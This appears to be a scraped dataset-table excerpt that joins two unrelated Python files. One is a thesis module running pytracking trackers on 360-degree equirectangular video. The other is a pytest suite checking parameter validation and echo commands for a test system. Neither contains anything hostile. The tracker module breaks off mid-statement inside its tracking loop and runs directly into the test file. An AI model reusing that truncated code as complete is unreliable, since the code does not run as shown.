input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
#################################################################################################
# Visual object tracking in panoramic video
# Master thesis at Brno University of Technology - Faculty of Information Technology
# Author: <NAME> (<EMAIL>)
# Supervisor: Doc. Ing. <NAME>, Ph.D.
# Module: tracker_360_default.py
# Description: Default tracking using ECO, ATOM, DiMP or KYS tracker
#################################################################################################
# --------------------------------------------------------
# pytracking (https://github.com/visionml/pytracking)
# Licensed under GPL-3.0 License
# Copyright <NAME>, <NAME>
# --------------------------------------------------------
import importlib
import os
import sys
import numpy as np
from collections import OrderedDict
from pytracking.evaluation.environment import env_settings
import time
import cv2 as cv
from pytracking.utils.visdom import Visdom
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from pytracking.utils.plotting import draw_figure, overlay_mask
from pytracking.utils.convert_vot_anno_to_rect import convert_vot_anno_to_rect
from ltr.data.bounding_box_utils import masks_to_bboxes
from pytracking.evaluation.multi_object_wrapper import MultiObjectWrapper
from pathlib import Path
import torch
# custom modules to improve equirectangular tracking
from pytracking.evaluation.boundingbox import BoundingBox
from pytracking.evaluation.parser import Parser
class Tracker360Default:
"""Default tracking using ECO, ATOM, DiMP or KYS tracker"""
def __init__(self, name: str, parameter_name: str, video_path: str, groundtruth_path: str = None, save_result_path: str = None, run_id = None):
assert run_id is None or isinstance(run_id, int)
self.name = name
self.parameter_name = parameter_name
self.video_path = video_path
self.groundtruth_path = groundtruth_path
if save_result_path:
self.save_result_path = save_result_path
else:
self.save_result_path = "tmp-result-" + self.name.upper() + ".txt"
self.run_id = None
self.video = None
self.video_width = None
self.video_height = None
self.frame = None
self.tracker = None
self.bbox = None
self.gt_bounding_boxes = []
self.result_bounding_boxes = []
# enable parsing/creating methods
self.parser = Parser()
# constants for sizes and positions of opencv circles, rectangles and texts
self.RECTANGLE_BORDER_PX = 3
self.FONT_SCALE = 0.75
self.FONT_WEIGHT = 1
self.TEXT_ROW1_POS = (30,30)
self.TEXT_ROW2_POS = (30,60)
self.TEXT_ROW3_POS = (30,90)
self.TEXT_ROW4_POS = (30,120)
self.WINDOW_NAME = "Tracker-" + self.name.upper()
env = env_settings()
if self.run_id is None:
self.results_dir = '{}/{}/{}'.format(env.results_path, self.name, self.parameter_name)
else:
self.results_dir = '{}/{}/{}_{:03d}'.format(env.results_path, self.name, self.parameter_name, self.run_id)
tracker_module_abspath = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'tracker', self.name))
if os.path.isdir(tracker_module_abspath):
tracker_module = importlib.import_module('pytracking.tracker.{}'.format(self.name))
self.tracker_class = tracker_module.get_tracker_class()
else:
self.tracker_class = None
self.visdom = None
def create_tracker(self, params):
tracker = self.tracker_class(params)
tracker.visdom = self.visdom
return tracker
def _init_visdom(self, visdom_info, debug):
visdom_info = {} if visdom_info is None else visdom_info
self.pause_mode = False
self.step = False
if debug > 0 and visdom_info.get('use_visdom', True):
try:
self.visdom = Visdom(debug, {'handler': self._visdom_ui_handler, 'win_id': 'Tracking'},
visdom_info=visdom_info)
# Show help
help_text = 'You can pause/unpause the tracker by pressing ''space'' with the ''Tracking'' window ' \
'selected. During paused mode, you can track for one frame by pressing the right arrow key.' \
'To enable/disable plotting of a data block, tick/untick the corresponding entry in ' \
'block list.'
self.visdom.register(help_text, 'text', 1, 'Help')
except:
time.sleep(0.5)
print('!!! WARNING: Visdom could not start, so using matplotlib visualization instead !!!\n'
'!!! Start Visdom in a separate terminal window by typing \'visdom\' !!!')
def _visdom_ui_handler(self, data):
if data['event_type'] == 'KeyPress':
if data['key'] == ' ':
self.pause_mode = not self.pause_mode
elif data['key'] == 'ArrowRight' and self.pause_mode:
self.step = True
def get_parameters(self):
"""Get parameters."""
param_module = importlib.import_module('pytracking.parameter.{}.{}'.format(self.name, self.parameter_name))
params = param_module.parameters()
return params
def _drawBoundingBox(self, videoWidth, point1, point2, boundingBox, color, thickness):
"""Method for drawing rectangle according to points"""
if (boundingBox.is_on_border()):
# draw two rectangles around the region of interest
rightBorderPoint = (videoWidth - 1, point2[1])
cv.rectangle(self.frame, point1, rightBorderPoint, color, thickness)
leftBorderPoint = (0, point1[1])
cv.rectangle(self.frame, leftBorderPoint, point2, color, thickness)
else:
# draw a rectangle around the region of interest
cv.rectangle(self.frame, point1, point2, color, thickness)
def _checkBoundsOfPoint(self, point):
"""Checks if given point is in interval [0,self.width] and [0,self.height] with x overflow"""
# horizontal could overflow in equirectangular
x = point[0]
y = point[1]
if x < 0:
x = self.video_width + x - 1
elif x > self.video_width - 1:
x = x - self.video_width - 1
# vertical
if y < 0:
y = 0
elif y > self.video_height - 1:
y = self.video_height - 1
point = (x,y)
return point
def _saveResults(self):
"""Method for saving result bounding boxes to .txt file"""
# creating string result data
resultData = self.parser.createAnnotations(self.result_bounding_boxes)
# saving file on drive
self.parser.saveDataToFile(self.save_result_path, resultData)
print("File '" + self.save_result_path + "' has been successfully created with total " + str(len(self.result_bounding_boxes)) + " computed frames.")
def run_video_default(self, optional_box=None, debug=None, visdom_info=None):
"""Method for start selected tracker without any modifications"""
params = self.get_parameters()
debug_ = debug
if debug is None:
debug_ = getattr(params, 'debug', 0)
params.debug = debug_
params.tracker_name = self.name
params.param_name = self.parameter_name
self._init_visdom(visdom_info, debug_)
multiobj_mode = getattr(params, 'multiobj_mode', getattr(self.tracker_class, 'multiobj_mode', 'default'))
if multiobj_mode == 'default':
self.tracker = self.create_tracker(params)
if hasattr(self.tracker, 'initialize_features'):
self.tracker.initialize_features()
elif multiobj_mode == 'parallel':
self.tracker = MultiObjectWrapper(self.tracker_class, params, self.visdom, fast_load=True)
else:
raise ValueError('Unknown multi object mode {}'.format(multiobj_mode))
###########################################################################
############# Part of custom modifications #############
###########################################################################
########## 1) Video Checking ##########
# Read video
self.video = cv.VideoCapture(self.video_path)
# Exit if video not opened.
if not self.video.isOpened():
print("Could not open video")
print(help)
sys.exit(-1)
# Read first frame.
ok, self.frame = self.video.read()
if not ok:
print("Error - Could not read a video file")
sys.exit(-1)
# save video width/height to global variables
self.video_width = int(self.video.get(cv.CAP_PROP_FRAME_WIDTH))
self.video_height = int(self.video.get(cv.CAP_PROP_FRAME_HEIGHT))
# correct format of initialization bbox
def _build_init_info(box):
return {'init_bbox': OrderedDict({1: box}), 'init_object_ids': [1, ], 'object_ids': [1, ], 'sequence_object_ids': [1, ]}
########## 2) Setup opencv window ##########
# resize window (lets define max width is 1600px)
if self.video_width < 1600:
cv.namedWindow(self.WINDOW_NAME)
else:
cv.namedWindow(self.WINDOW_NAME, cv.WINDOW_NORMAL | cv.WINDOW_KEEPRATIO)
whRatio = self.video_width / self.video_height
if whRatio == 2:
# pure equirectangular 2:1
cv.resizeWindow(self.WINDOW_NAME, 1600, 800)
else:
# default 16:9
cv.resizeWindow(self.WINDOW_NAME, 1600, 900)
scaleFactor = self.video_width / 1600
self.RECTANGLE_BORDER_PX = int(self.RECTANGLE_BORDER_PX * scaleFactor)
self.FONT_SCALE = self.FONT_SCALE * scaleFactor
self.FONT_WEIGHT = int(self.FONT_WEIGHT * scaleFactor) + 1
self.TEXT_ROW1_POS = (int(self.TEXT_ROW1_POS[0] * scaleFactor), int(self.TEXT_ROW1_POS[1] * scaleFactor))
self.TEXT_ROW2_POS = (int(self.TEXT_ROW2_POS[0] * scaleFactor), int(self.TEXT_ROW2_POS[1] * scaleFactor))
self.TEXT_ROW3_POS = (int(self.TEXT_ROW3_POS[0] * scaleFactor), int(self.TEXT_ROW3_POS[1] * scaleFactor))
self.TEXT_ROW4_POS = (int(self.TEXT_ROW4_POS[0] * scaleFactor), int(self.TEXT_ROW4_POS[1] * scaleFactor))
# use copy of frame to be shown in window
frame_disp = self.frame.copy()
########## 3) Initialation of bounding box ##########
# Set up initial bounding box
self.bbox = None
self.result_bounding_boxes = []
self.gt_bounding_boxes = []
if self.groundtruth_path:
# use first bounding box from given groundtruth
self.gt_bounding_boxes = self.parser.parseGivenDataFile(self.groundtruth_path, self.video_width)
if len(self.gt_bounding_boxes) > 0:
bb1 = self.gt_bounding_boxes[0]
if bb1.is_annotated:
self.bbox = (bb1.get_point1_x(), bb1.get_point1_y(), bb1.get_width(), bb1.get_height())
self.result_bounding_boxes.append(bb1)
else:
print("Error - Invalid first frame annotation from file: '" + self.groundtruth_path + "'")
sys.exit(-1)
else:
# using opencv select ROI
cv.putText(frame_disp, 'Select target ROI and press ENTER', self.TEXT_ROW1_POS, cv.FONT_HERSHEY_SIMPLEX, self.FONT_SCALE, (0, 200, 250), self.FONT_WEIGHT)
x, y, w, h = cv.selectROI(self.WINDOW_NAME, frame_disp, False)
self.bbox = [x, y, w, h]
# save it to result list
p1 = (int(self.bbox[0]), int(self.bbox[1]))
p2 = (int(self.bbox[0] + self.bbox[2]), int(self.bbox[1] + self.bbox[3]))
# new instance of bounding box
bb1 = BoundingBox(p1, p2, self.video_width)
bb1.is_annotated = True
self.result_bounding_boxes.append(bb1)
if not(self.bbox) or self.bbox == (0,0,0,0):
print("Error - Invalid first frame annotation")
sys.exit(-1)
########## 4) Tracking process ##########
# prints just basic guide and info
print("--------------------------------------------------------------------")
print("pytracking default tracking process has started...")
print("Tracker : " + self.name.upper())
print("Frame #1 : " + str(self.bbox))
print("Press 'Esc' or 'Q' key to exit")
print("--------------------------------------------------------------------")
# display first frame
cv.imshow(self.WINDOW_NAME, frame_disp)
# initialize tracker with first frame and bounding box
self.tracker.initialize(self.frame, _build_init_info(self.bbox))
# if you want to have the FPS according to the video then uncomment this code
# fps = cap.get(cv.CAP_PROP_FPS)
videoFPS = 30
# calculate the interval between frame
interval = int(1000/videoFPS)
while True:
# Read a new frame
ok, self.frame = self.video.read()
if not ok:
break
# Start timer
timer = cv.getTickCount()
# Get tracked bbox
out = self.tracker.track(self.frame)
state = [int(s) for s in out['target_bbox'][1]]
# Calculate Frames per second (FPS)
fps = cv.getTickFrequency() / (cv.getTickCount() - timer)
# draw bounding box
if state[0] and state[1] and state[2] and state[3]:
# Tracking success
p1 = (state[0], state[1])
p2 = (state[0] + state[2], state[1] + state[3])
p1 = self._checkBoundsOfPoint(p1)
p2 = self._checkBoundsOfPoint(p2)
# new instance of bounding box
bb = BoundingBox(p1, p2, self.video_width)
bb.is_annotated = True
self.result_bounding_boxes.append(bb)
# draw bounding box to original frame
self._drawBoundingBox(self.video_width, p1, p2, bb, (0, 255, 0), self.RECTANGLE_BORDER_PX)
else:
# tracking failure
cv.putText(self.frame, "Tracking failure detected", self.TEXT_ROW4_POS, cv.FONT_HERSHEY_SIMPLEX, self.FONT_SCALE, (0, 0, 255), self.FONT_WEIGHT)
# new instance of bounding box
bb | |
import json
import pytest
from helper import wait_for_response
from helper.assertion import assert_successful_request, assert_validation_error
@pytest.fixture(scope="class")
def system_spec():
    """Class-scoped fixture identifying the 'complex' test system instance under test."""
    return {'system': 'complex', 'system_version': '1.0.0.dev0', 'instance_name': 'c1'}
@pytest.mark.usefixtures('easy_client', 'request_generator')
class TestComplex(object):
def test_invalid_instance_name(self):
request = self.request_generator.generate_request(instance_name="INVALID_NAME", command="ping")
assert_validation_error(self, self.easy_client, request)
def test_invalid_system_name(self):
request = self.request_generator.generate_request(system="BAD_SYSTEM_NAME", command="ping")
assert_validation_error(self, self.easy_client, request)
def test_invalid_system_version(self):
request = self.request_generator.generate_request(system_version="INVALID_VERSION", command="ping")
assert_validation_error(self, self.easy_client, request)
def test_invalid_command(self):
request = self.request_generator.generate_request(command="INVALID_COMMAND")
assert_validation_error(self, self.easy_client, request)
def test_good_ping(self):
request = self.request_generator.generate_request(command="ping")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
def test_ping_with_invalid_parameters(self):
request = self.request_generator.generate_request(command="ping", parameters={"foo": "bar"})
assert_validation_error(self, self.easy_client, request)
def test_ping_with_comment(self):
request = self.request_generator.generate_request(command="ping", comment="comment_text")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, comment="comment_text")
def test_boolean_good(self):
request = self.request_generator.generate_request(command="echo_bool",
parameters={"b": True})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="true")
def test_boolean_bad_type(self):
request = self.request_generator.generate_request(command="echo_bool",
parameters={"b": "NOT_A_BOOL"})
assert_validation_error(self, self.easy_client, request)
def test_nullable_boolean_as_null(self):
request = self.request_generator.generate_request(command="echo_boolean_nullable",
parameters={"b": None})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_nullable_boolean_with_true_default_as_null(self):
request = self.request_generator.generate_request(command="echo_boolean_nullable_with_true_default",
parameters={"b": None})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_nullable_boolean_with_true_not_in_param(self):
request = self.request_generator.generate_request(command="echo_boolean_nullable_with_true_default",
parameters={})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="true")
def test_optional_boolean_with_false_default(self):
request = self.request_generator.generate_request(command="echo_boolean_optional_with_false_default")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="false")
def test_echo_float_valid(self):
request = self.request_generator.generate_request(command="echo_float",
parameters={"f": 1.2})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="1.2")
def test_echo_float_invalid_type(self):
request = self.request_generator.generate_request(command="echo_float",
parameters={"f": "INVALID_TYPE"})
assert_validation_error(self, self.easy_client, request)
def test_echo_integer_valid(self):
request = self.request_generator.generate_request(command="echo_integer",
parameters={"i": 1})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="1")
def test_echo_integer_invalid_type(self):
request = self.request_generator.generate_request(command="echo_integer",
parameters={"i": 1.2})
assert_validation_error(self, self.easy_client, request)
def test_echo_integer_in_choice(self):
request = self.request_generator.generate_request(command="echo_integer_with_lots_of_choices",
parameters={"i": 15})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="15")
def test_echo_integer_invalid_choice(self):
request = self.request_generator.generate_request(command="echo_integer_with_lots_of_choices",
parameters={"i": 1.5})
assert_validation_error(self, self.easy_client, request)
def test_echo_integer_choice_out_of_range(self):
request = self.request_generator.generate_request(command="echo_integer_with_lots_of_choices",
parameters={"i": -10})
assert_validation_error(self, self.easy_client, request)
def test_echo_list_model(self):
parameters = {"model": {"my_list_of_strings": ["a", "b", "c"], "my_choices_string": "a"}}
request = self.request_generator.generate_request(command="echo_list_model",
parameters=parameters)
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert parameters['model'] == json.loads(response.output)
def test_echo_list_model_invalid_model_type(self):
request = self.request_generator.generate_request(command="echo_list_model",
parameters={"model": ["SHOULD_BE_DICT"]})
assert_validation_error(self, self.easy_client, request)
def test_echo_list_model_invalid_type_inside_list(self):
request = self.request_generator.generate_request(command="echo_list_model",
parameters={"model": ["good", {"bad": "time"}]})
assert_validation_error(self, self.easy_client, request)
def test_echo_list_model_null_inside_list_not_allowed(self):
request = self.request_generator.generate_request(command="echo_list_model",
parameters={"model": ["good", None]})
assert_validation_error(self, self.easy_client, request)
def test_echo_list_of_booleans(self):
request = self.request_generator.generate_request(command="echo_list_of_booleans",
parameters={"list_of_b": [True, False]})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps([True, False]))
def test_echo_list_of_booleans_with_maximum_good(self):
request = self.request_generator.generate_request(command="echo_list_of_booleans_with_maximum",
parameters={"list_of_b": [True, False]})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps([True, False]))
def test_echo_list_of_booleans_with_maximum_too_many(self):
request = self.request_generator.generate_request(command="echo_list_of_booleans_with_maximum",
parameters={"list_of_b": [True, False, True]})
assert_validation_error(self, self.easy_client, request)
def test_echo_list_of_booleans_with_minimum_good(self):
request = self.request_generator.generate_request(command="echo_list_of_booleans_with_minimum",
parameters={"list_of_b": [True, False]})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps([True, False]))
def test_echo_list_of_booleans_with_minimum_too_few(self):
request = self.request_generator.generate_request(command="echo_list_of_booleans_with_minimum",
parameters={"list_of_b": [True]})
assert_validation_error(self, self.easy_client, request)
def test_echo_list_of_integers(self):
request = self.request_generator.generate_request(command="echo_list_of_integers",
parameters={"list_of_i": [1, 2]})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps([1, 2]))
def test_echo_list_of_strings(self):
request = self.request_generator.generate_request(command="echo_list_of_strings",
parameters={"list_of_s": ["1", "2"]})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps(["1", "2"]))
def test_echo_list_of_strings_with_choices(self):
request = self.request_generator.generate_request(command="echo_list_of_strings_with_choices",
parameters={"list_of_s": ["a", "b"]})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps(["a", "b"]))
def test_echo_list_of_strings_with_choices_repeat_values(self):
request = self.request_generator.generate_request(command="echo_list_of_strings_with_choices",
parameters={"list_of_s": ["a", "a"]})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps(["a", "a"]))
def test_echo_list_of_strings_with_default(self):
request = self.request_generator.generate_request(command="echo_list_of_strings_with_default",
parameters={})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps(["a", "b", "c"]))
def test_echo_list_of_strings_with_default_required_no_list_provided(self):
request = self.request_generator.generate_request(command="echo_list_of_strings_with_default_required",
parameters={})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps(['a', 'b', 'c']))
def test_echo_list_of_strings_with_default_required_none_entry_provided(self):
request = self.request_generator.generate_request(command="echo_list_of_strings_with_default_required",
parameters={"list_of_s": None})
assert_validation_error(self, self.easy_client, request)
def test_echo_message_huge_json(self):
request = self.request_generator.generate_request(command='echo_message_huge_json')
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
def test_echo_model(self):
parameters = {
'model': {
'my_string': 'my_string',
'my_string_with_choices': 'A',
'my_int': 1,
'my_float': 1.2,
'my_bool': True,
'my_any': ["this", "is", "an", "any"],
'my_raw_dict': {"foo": "bar", "baz": [1, 2, 3], "null_thing": None, "dict": {"another": "dict"},
"ball": 1, "float": 1.2, "bool": False},
'my_nested_model': {
'my_nested_string': "my_nested_string",
'my_nested_int': 2
},
'my_list_of_strings': ['a', 'b', 'c'],
'my_optional_string': 'provided_anyway',
'my_nullable_string': None,
'my_list_of_models': [
{'my_list_of_strings': ['more', 'list', 'of', 'strings'], "my_choices_string": "a"},
{'my_list_of_strings': ['more', 'list', 'of', 'strings2'], "my_choices_string": "b"},
]
}
}
request = self.request_generator.generate_request(command="echo_model",
parameters=parameters)
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert parameters['model'] == json.loads(response.output)
def test_echo_model_optional_not_provided(self):
request = self.request_generator.generate_request(command="echo_model_optional")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_model_simple_list(self):
parameters = {
'models': [
{'my_nested_string': "foo", "my_nested_int": 1},
{'my_nested_string': "bar", "my_nested_int": 2},
{'my_nested_string': "baz", "my_nested_int": 3}
]
}
request = self.request_generator.generate_request(command="echo_model_simple_list",
parameters=parameters)
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert parameters['models'] == json.loads(response.output)
def test_echo_model_simple_list_with_default(self):
request = self.request_generator.generate_request(command="echo_model_simple_list_with_default")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert json.loads(response.output) == [
{"my_nested_string": "str1", "my_nested_int": 1},
{"my_nested_string": "str2", "my_nested_int": 2}
]
def test_echo_model_with_nested_defaults_override(self):
model = {"my_foo": "foo", "my_bar": "bar"}
request = self.request_generator.generate_request(command="echo_model_with_nested_defaults",
parameters={"model": model})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps(model))
def test_echo_model_with_nested_defaults_partial_fallback_to_model(self):
model = {"my_foo": "foo"}
request = self.request_generator.generate_request(command="echo_model_with_nested_defaults",
parameters={"model": model})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps({"my_foo": "foo", "my_bar": "defaultBarFromModel"}))
def test_echo_model_with_nested_defaults_fallback_to_model_defaults(self):
request = self.request_generator.generate_request(command="echo_model_with_nested_defaults",
parameters={"model": {}})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps({"my_foo": "defaultFooFromModel",
"my_bar": "defaultBarFromModel"}))
def test_echo_model_with_nested_defaults_nothing_provided(self):
request = self.request_generator.generate_request(command="echo_model_with_nested_defaults")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps({"my_foo": "clientFooValue", "my_bar": "clientBarValue"}))
def test_echo_model_with_nested_defaults_invalid_key_provided(self):
request = self.request_generator.generate_request(command="echo_model_with_nested_defaults",
parameters={"model": {"BAD_KEY": "abc"}})
assert_validation_error(self, self.easy_client, request)
def test_echo_model_with_nested_defaults_no_main_nothing_provided(self):
request = self.request_generator.generate_request(command="echo_model_with_nested_defaults_no_main")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps({"my_foo": "defaultFooFromModel",
"my_bar": "defaultBarFromModel"}))
def test_echo_optional_any_multi_message_with_default(self):
parameters = {"messages": [
"foo",
None,
{"foo": "bar"},
1,
1.2,
["a", "b", "c"],
True
]}
request = self.request_generator.generate_request(command="echo_optional_any_multi_message_with_default",
parameters=parameters)
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert json.loads(response.output) == parameters['messages']
def test_echo_optional_message_nullable_false_null_provided(self):
request = self.request_generator.generate_request(command="echo_optional_message_nullable_false",
parameters={"message": None})
assert_validation_error(self, self.easy_client, request)
def test_echo_optional_message_nullable_false_no_key_provided(self):
request = self.request_generator.generate_request(command="echo_optional_message_nullable_false",
parameters={})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
def test_echo_optional_message_nullable_true_no_default_no_key(self):
request = self.request_generator.generate_request(command="echo_optional_message_nullable_true_no_default",
parameters={})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_optional_message_nullable_true_no_default_null(self):
request = self.request_generator.generate_request(command="echo_optional_message_nullable_true_no_default",
parameters={"message": None})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_optional_message_nullable_true_non_null_default_no_key(self):
request = self.request_generator.generate_request(command="echo_optional_message_nullable_true_non_default")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="can be null")
def test_echo_optional_message_nullable_true_non_null_default_none(self):
request = self.request_generator.generate_request(command="echo_optional_message_nullable_true_non_default",
parameters={"message": None})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_optional_model_with_defaults_no_key(self):
request = self.request_generator.generate_request(command="echo_optional_model_with_defaults")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_optional_model_with_defaults_key_none(self):
request = self.request_generator.generate_request(command="echo_optional_model_with_defaults",
parameters={"model": None})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_optional_model_with_defaults_empty_model(self):
request = self.request_generator.generate_request(command="echo_optional_model_with_defaults",
parameters={"model": {}})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps({"my_foo": "defaultFooFromModel",
"my_bar": "defaultBarFromModel"}))
def test_echo_optional_model_with_defaults_partial_model(self):
request = self.request_generator.generate_request(command="echo_optional_model_with_defaults",
parameters={"model": {"my_foo": "provided"}})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps({"my_foo": "provided",
"my_bar": "defaultBarFromModel"}))
def test_echo_optional_multi_nullable_model_empty_list_provided(self):
request = self.request_generator.generate_request(command="echo_optional_multi_nullable_model",
parameters={"param": []})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="[]")
def test_echo_optional_multi_nullable_model_none_provided(self):
request = self.request_generator.generate_request(command="echo_optional_multi_nullable_model",
parameters={"param": None})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_optional_multi_nullable_model_no_key(self):
request = self.request_generator.generate_request(command="echo_optional_multi_nullable_model",
parameters={})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_optional_multi_nullable_model_list_provided(self):
parameters = {'param': [
{"my_nested_string": "str1", "my_nested_int": 1}
]}
request = self.request_generator.generate_request(command="echo_optional_multi_nullable_model",
parameters=parameters)
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert parameters['param'] == json.loads(response.output)
def test_echo_optional_multi_nullable_model_with_both_defaults(self):
request = self.request_generator.generate_request(
command="echo_optional_multi_nullable_model_with_both_defaults")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert [{'my_foo': 'foo', 'my_bar': 'bar'}] == json.loads(response.output)
def test_echo_optional_multi_nullable_model_with_partial_default_provided(self):
parameters = {
'param': [
{"my_foo": "foo_from_client"}
]
}
request = self.request_generator.generate_request(
command="echo_optional_multi_nullable_model_with_both_defaults",
parameters=parameters
)
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert [{'my_foo': 'foo_from_client', 'my_bar': 'defaultBarFromModel'}] == json.loads(response.output)
def test_echo_optional_multi_nullable_model_with_model_defaults(self):
request = self.request_generator.generate_request(
command="echo_optional_multi_nullable_model_with_model_defaults",
parameters={"param": [{}]}
)
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert [{'my_foo': 'defaultFooFromModel', 'my_bar': 'defaultBarFromModel'}] == json.loads(response.output)
def test_echo_optional_multi_nullable_model_with_multi_defaults(self):
request = self.request_generator.generate_request(
command="echo_optional_multi_nullable_model_with_multi_defaults"
)
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert [{'my_nested_string': 'hi', 'my_nested_int': 2}] == json.loads(response.output)
def test_echo_optional_multi_nullable_model_with_multi_defaults_partial(self):
    """A partially-specified nested model must fail validation for this command."""
    request = self.request_generator.generate_request(
        command="echo_optional_multi_nullable_model_with_multi_defaults",
        parameters={"param": [{"my_nested_string": "hi"}]},
    )
    assert_validation_error(self, self.easy_client, request)
def test_echo_optional_multi_nullable_string(self):
    """Omitting the parameter should echo the default string list."""
    request = self.request_generator.generate_request(
        command="echo_optional_multi_nullable_string",
    )
    response = wait_for_response(self.easy_client, request)
    assert_successful_request(response, output=json.dumps(["hello", "there"]))
def test_echo_optional_multi_nullable_string_null_provided(self):
    """An explicit null should be echoed back as JSON null."""
    request = self.request_generator.generate_request(
        command="echo_optional_multi_nullable_string",
        parameters={"param": None},
    )
    response = wait_for_response(self.easy_client, request)
    assert_successful_request(response, output="null")
def test_dictionary_no_model_invalid_type(self):
    """A non-dict value for a dictionary parameter must fail validation."""
    request = self.request_generator.generate_request(
        command="echo_raw_dictionary",
        parameters={"d": "THIS IS NOT A DICT"},
    )
    assert_validation_error(self, self.easy_client, request)
def test_dictionary_no_model_valid_type(self):
    """A plain dict should be echoed back unchanged."""
    request = self.request_generator.generate_request(
        command="echo_raw_dictionary",
        parameters={"d": {"foo": "bar"}},
    )
    response = wait_for_response(self.easy_client, request)
    assert_successful_request(response, output=json.dumps({"foo": "bar"}))
def test_echo_raw_dictionary_nullable(self):
    """A nullable dictionary given an explicit null echoes JSON null."""
    request = self.request_generator.generate_request(
        command="echo_raw_dictionary_nullable",
        parameters={"d": None},
    )
    response = wait_for_response(self.easy_client, request)
    assert_successful_request(response, output="null")
def test_echo_raw_dictionary_nullable_no_key(self):
    """Nullable but still required: omitting the key must fail validation."""
    request = self.request_generator.generate_request(
        command="echo_raw_dictionary_nullable",
        parameters={},
    )
    assert_validation_error(self, self.easy_client, request)
def test_echo_raw_dictionary_nullable_optional(self):
    """An optional dictionary given an explicit null echoes JSON null."""
    request = self.request_generator.generate_request(
        command="echo_raw_dictionary_optional",
        parameters={"d": None},
    )
    response = wait_for_response(self.easy_client, request)
    assert_successful_request(response, output="null")
def test_echo_raw_dictionary_nullable_optional_no_key(self):
    """An optional dictionary with no key provided echoes JSON null."""
    request = self.request_generator.generate_request(
        command="echo_raw_dictionary_optional",
        parameters={},
    )
    response = wait_for_response(self.easy_client, request)
    assert_successful_request(response, output="null")
def test_echo_raw_dictionary_optional_with_default(self):
    """An optional dictionary with a default echoes the default when omitted."""
    request = self.request_generator.generate_request(
        command="echo_raw_dictionary_optional_with_default",
        parameters={},
    )
    response = wait_for_response(self.easy_client, request)
    assert_successful_request(response, output=json.dumps({"foo": "bar"}))
def test_echo_raw_dictionary_optional_with_maximum_too_many(self):
    """Exceeding the dictionary's maximum size must fail validation."""
    request = self.request_generator.generate_request(
        command="echo_raw_dictionary_optional_with_maximum",
        parameters={"1": "foo", "2": "foo", "3": "foo"},
    )
    assert_validation_error(self, self.easy_client, request)
def test_echo_required_any_message(self):
    """A required Any-typed message should be echoed back unchanged."""
    request = self.request_generator.generate_request(
        command="echo_required_any_message",
        parameters={"message": {"foo": "bar"}},
    )
    response = wait_for_response(self.easy_client, request)
    assert_successful_request(response, output=json.dumps({"foo": "bar"}))
def test_echo_required_any_multi_message(self):
    """A required multi Any-typed message should be echoed back unchanged."""
    sent = [{"foo": "bar"}]
    request = self.request_generator.generate_request(
        command="echo_required_any_multi_message",
        parameters={"messages": sent},
    )
    response = wait_for_response(self.easy_client, request)
    assert_successful_request(response)
    assert json.loads(response.output) == sent
def test_echo_required_message(self):
    """Omitting a required parameter must fail validation."""
    request = self.request_generator.generate_request(command="echo_required_message")
    assert_validation_error(self, self.easy_client, request)
def test_echo_required_message_nullable_false_no_default(self):
    """Required, non-nullable, no default: omission must fail validation."""
    request = self.request_generator.generate_request(
        command="echo_required_message_nullable_false_no_default",
    )
    assert_validation_error(self, self.easy_client, request)
def test_echo_required_message_nullable_false_with_default(self):
    """An explicit null for a non-nullable parameter must fail validation."""
    request = self.request_generator.generate_request(
